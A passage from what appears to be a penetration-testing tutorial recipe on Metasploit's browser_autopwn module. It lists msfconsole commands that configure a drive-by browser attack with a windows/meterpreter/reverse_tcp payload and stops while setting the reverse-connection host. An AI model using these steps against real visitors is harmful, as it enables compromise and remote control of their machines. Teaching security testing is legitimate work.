Implementing browser_autopwn
Browser Autopwn is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim machine simply when they access a webpage. Browser Autopwn performs a fingerprint of the client before it attacks; meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of browser, it decides which exploit is the best to deploy.
Getting ready
A connection to the Internet or internal network is required to complete this recipe.
How to do it...
Let's begin by opening a terminal window:
Open a terminal window.
Launch the MSFCONSOLE:
msfconsoleSearch for the
autopwnmodules:Search autopwn
Use the
browser_autopwnmodule:Use auxiliary/server/browser_autopwnSet our payload. In this case we use Windows Reverse TCP:
set payload windows/meterpreter/reverse_tcpShow the options for this type of payload:
show optionsSet the host IP address where the reverse connection will be made. In this case...
